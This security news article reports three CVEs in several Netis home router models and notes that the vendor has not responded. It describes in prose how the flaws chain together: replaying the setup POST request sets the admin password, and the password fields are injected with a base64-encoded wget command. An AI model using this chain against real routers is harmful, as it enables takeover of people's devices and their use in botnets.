Several Netis router models were found to have firmware vulnerabilities that could be chained together for sensitive information disclosure, authentication bypass and remote code execution (RCE).
The three vulnerabilities affect WiFi and 4G Netis home router models including the NX10, NC65, NC63, NC21 and MW5360. The flaws were discovered by h00die-gr3y on GitHub, who published an analysis and indicated that no fixes were available as they never received a response from Netis about their vulnerability report.
SC Media attempted to reach out to Netis to ask whether fixes would be made available and did not receive a response by time of publication.
Flawed password reset systems enable authentication bypass, command injection
The RCE vulnerability tracked as CVE-2024-48456 could enable an authenticated remote attacker to hijack the admin password reset feature in order to run code fetched from an attacker-controlled server.
While achieving RCE on an affected Netis router requires administrator access, this access can be achieved by chaining CVE-2024-48456 with the flaw tracked as CVE-2024-48457, which enables an unauthenticated attacker to remotely set the router’s admin password.
H00die-gr3y found that the POST request used for initial setup of the router, WiFi password and admin password can be repeated at any time, meaning an attacker can send their own request to remotely reset the router and set the admin password to anything they want.
Now with admin access to the router, the attacker can then exploit CVE-2024-48456 by using the router’s web interface to initiate a new admin password reset. If the attacker can intercept the POST request sent to the router for the password reset, they can replace the “password” and “new_pwd_confirm” fields with a base64-encoded wget command to retrieve a file from their own external server and relay the modified request back to the router to achieve RCE.
An additional vulnerability, tracked as CVE-2024-48455, allows an unauthenticated remote attacker to send a simple POST request to the router to retrieve potentially sensitive information about the device that could be used to inform future attacks.
A full list of affected firmware versions is available in h00die-gr3y’s research notes. The vulnerabilities were first discovered in May 2024 and were published in the NIST National Vulnerability Database on Monday.
Routers, such as those sold by Netis, can be hijacked for use in botnets to launch wider-scale cyberattacks; for example Netis devices, along with routers by D-Link and Zyxel, were used in a Mirai botnet-based DDoS campaign in October 2023.
In 2014, Netis routers were impacted by a backdoor that could enable any device with an externally accessible IP address to be targeted by remote attackers.
